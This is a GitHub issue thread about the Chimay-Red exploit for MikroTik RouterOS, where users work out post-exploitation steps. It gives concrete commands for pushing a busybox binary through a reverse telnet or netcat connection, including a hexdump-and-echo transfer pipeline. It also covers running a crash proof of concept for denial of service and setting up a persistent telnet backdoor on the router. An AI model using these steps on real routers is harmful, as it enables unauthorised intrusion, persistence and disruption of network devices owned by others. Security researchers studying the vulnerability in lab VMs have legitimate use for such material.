How to exploit it in real world?

[jinyu00]

Now I can run system() by rop, but I don't know how to exploit it without add our busybox, Because the default busybox only support few command.

[BigNerd95]

I think this request is out of the scope of this repo. You can list files using echo *. Others basic commands are present. I think it's possible to download busybox using telnet as a fake http client. Good luck ;-)

[11ume]

Hi BigNerd, the cuestion is how upload an busybox or tinyshell from remotely and create the rc.d, run.d and the bash file whitout mount the sda, Stack Clash x86, depends of the binaries that come with busybox for create a reverse shell, you talk about is possible download busybox using telnet as a fake http client or im wrong?. You could explain a little about this.

Thanks for your great work, greetings! 💪

[BigNerd95]

Look at this line of code: https://github.com/BigNerd95/ASUSddns/blob/master/slim/ASUSddns_slim.sh#L29

I passed the http request to the stdin of netcat I think it is possible to do a similar thing with telnet (not tested yet)

[BigNerd95]

Anyway Once you have the admin password you can upload any binary file from webfig And then execute them with the reverse shell in /rw/pckg/ folder

[BigNerd95]

Or another easy way is to edit the reverse shell command with something like this:

"/bin/telnet 192.168.8.5 1234 > /ram/busybox"

And open netcat on the pc with this: $ nc -l -p 1234 < busybox

This should be able to upload the binary

[11ume]

Thanks for your answer, did not achieve remote command execution, I have two virtual machines running in Hyper-v with RouterOS v6.32.2 x86 one with busybox inserted and the other one equal but it is clean without busy.

Cool It is true this can also work with telnet 🏄

echo $(echo -e -n "GET / HTTP/1.1\r\nHost: api.ipify.org\r\n\r\n" | nc -w 5 api.ipify.org 80 | tail -1)

Test:

Using StackClash_x86:

Direct interaction whit Busybox:

[BigNerd95]

May you test usign 6.38.4? Older versions of RouterOS have a dicferent pthread stack size I already fixed mips exploit But i still need to fix the x86 exploit

[BigNerd95]

Try to make it crash before stack clash ./POCs/CrashPOC.py 192.168.1.10 dos

[BigNerd95]

I uploaded busybox using this: (Reverse shell command on target) On PC:

hexdump -v -e '"echo -e -n " 1024/1 "\\\\x%02X" " >> /ram/busybox\n"' busybox-i686 | sed -e "s/\\\\\\\\x  //g" | nc -l -q 0 -p 1234

Basically it send the file as blocks of 1KB and write it to a file using echo
Example:

Then you can launch again the reverse shell command and you can find busybox binary in /ram/

[11ume]

Really cool io pipeline! I will keep it in mind for when I can perform the remote code execution thanks.

Test of CrashPOC

Different versions of python and differentes versions of terminals

What happens with cygwin must be a problem in the tty, it is irrelevant.

---

Apparently CrashPOC only works with python 3, the code seems very simple can be a problem in the sockets library?

Test in Ubuntu server whit python 3.x

I have not tried StackClash_x86 in python 3, since pwntools is written in py 2.7

This was my feedback I hope it's useful Regards!

[BigNerd95]

All my code is for python3 Only StackClash_x86 is for python2 due to pwntools works only with py2 But I think I'll convert it to python3 using ropper

Anyway in put the shebang in the first line of my scripts So if you run them directly (eg: ./CrashPoc.py) the correct version of python should be automatically used

[11ume]

You're right, it happens that I have not made them executable, excuse my ignorance, thanks for the information, i not read the shebang.

I found a fork for python 3 of pwntools https://github.com/arthaud/python3-pwntools

[ghost]

I can upload busybox to the VM on RouterOS 6.35.4 but i don't get how can i get a shell with busybox runnig.

Thanks for th help in advance

[tostercx]

@SrSands you mean you can connect to the shell but don't know how to use the newly uploaded busybox? I did something like:

chmod +x /rw/pckg/busybox-mips # make execuatable
alias bb=/rw/pckg/busybox-mips
alias ls='bb ls' # add some shorthands

ls -l
total 2575
-rw-r-----    1 root     root         18401 Jan  2  1970 auto-before-reset.backup
-rw-r--r--    1 root     root        535892 Mar 27 23:18 autosupout.old.rif
-rw-r--r--    1 root     root        541016 Mar 27 23:27 autosupout.rif
-rwxr-xr-x    1 root     root       1534396 Mar 27 23:43 busybox-mips
drwxr-xr-x    1 root     root          2048 Mar 26 19:13 pub
drwxr-xr-x    1 root     root          2048 Jan  1  1970 skins
drwxr-xr-x    1 root     root          2048 Sep 22  1970 web-proxy1

I think you can add the aliases to startup scripts somehow. Not sure.

The other option is to write softlinks for the commands under /bin but writing to the NAND is a PITA... and you need to plug cables in and out. Here's a tutorial, haven't tried: http://blog.rchapman.org/posts/Getting_shell_on_a_RouterBoard/

Also this guy made an automated "jailbreak" that installs busybox and enables devel-login: https://github.com/0ki/mikrotik-tools AFAIK you just run this VM image in lan and follow the instructions (also haven't tested): http://02.lv/f/2018/01/06/MT_JB_0.92.ova

edit

Hmm... so I guess this is their setup script router side: https://github.com/0ki/mikrotik-tools/blob/master/exploit-backup/slave.sh

Basically copy busybox to /flash/bin, make a bunch of softlinks, add it to path. Doesn't the path variable clear after a reboot tho?

[BigNerd95]

Simply copy the the new busybox in /flash/bin Then run

chmod 777 /flash/bin/busybox
/flash/bin/busybox --install -s /flash/bin/

I dont know why you do not read my README.md https://github.com/BigNerd95/Chimay-Red/blob/master/README.md#persistent-telnet-server This example does all these things automatically for you

[BigNerd95]

The PATH already contains /flash/bin So you dont have to add it to the PATH

[tostercx]

@BigNerd95 thanks, the telnet upload wasn't working for me so I guess I didn't read past that part ^^;;

Btw I don't have /flash/bin in the PATH?

echo $PATH
/usr/local/bin:/usr/bin:/sbin:/bin

edit

After I did the steps for a persistent install manually, it appeared in PATH :)) I guess it's because the www service had different env vars?

[ghost]

@BigNerd95 Thanks, i didn't pay attention to the reverse telnet but anyway I'm going to try both methods

EDIT

I tried the persistent telnet example but keeps failing asking me for the ropper module although i I installed it from the git repository i think is a error from my end and im still working on it (i dont have as much free time as i want)

[ghost]

Thanks for the help @BigNerd95 & @tostercx but every time that i try to interact with busybox-mips I get: /flash/bin/busybox-mips: 1: Trying: not found /flash/bin/busybox-mips: 2: Connected: not found /flash/bin/busybox-mips: 3: Escape: not found (that time was trying the BigNerd example but with tostercx i get the same response, only in another directory) I have the file copied to both directories doing an echo * show it

don't know what I'm doing wrong If anyone can help me a little i would be thankful

[BigNerd95]

If you receive these three "not found" it's normal Simply ingnore them ;)

[ghost]

Then maybe is a problem whit the busybox version because its happening this:

chmod 777 /flash/bin/busybox-mips /flash/bin/busybox --install -s /flash/bin/ /bin/bash: /flash/bin/busybox: not found /flash/bin/busybox-mips --install -s /flash/bin/ /flash/bin/busybox-mips: 1: Trying: not found /flash/bin/busybox-mips: 2: Connected: not found /flash/bin/busybox-mips: 3: Escape: not found ls /bin/bash: ls: not found ls -l /bin/bash: ls: not found

Thanks in advance

[BigNerd95]

export PATH=/flash/bin:$PATH

[ghost]

Getting the same result :(

chmod 777 /flash/bin/busybox-mips /flash/bin/busybox --install -s /flash/bin/ /bin/bash: /flash/bin/busybox: not found /flash/bin/busybox-mips --install -s /flash/bin/ /flash/bin/busybox-mips: 1: Trying: not found /flash/bin/busybox-mips: 2: Connected: not found /flash/bin/busybox-mips: 3: Escape: not found export PATH=/flash/bin:$PATH ls /bin/bash: ls: not found ls -l /bin/bash: ls: not found

[BigNerd95]

Try with: /flash/bin/ls -l

[ghost]

Same result

/flash/bin/ls -l /bin/bash: /flash/bin/ls: not found cd /flash/bin echo busybox-mips milo cd /flash/bin/ls -l /bin/bash: /flash/bin/ls: not found cd flash/bin/ echo busybox-mips milo cd /flash/bin/ls -l /bin/bash: /flash/bin/ls: not found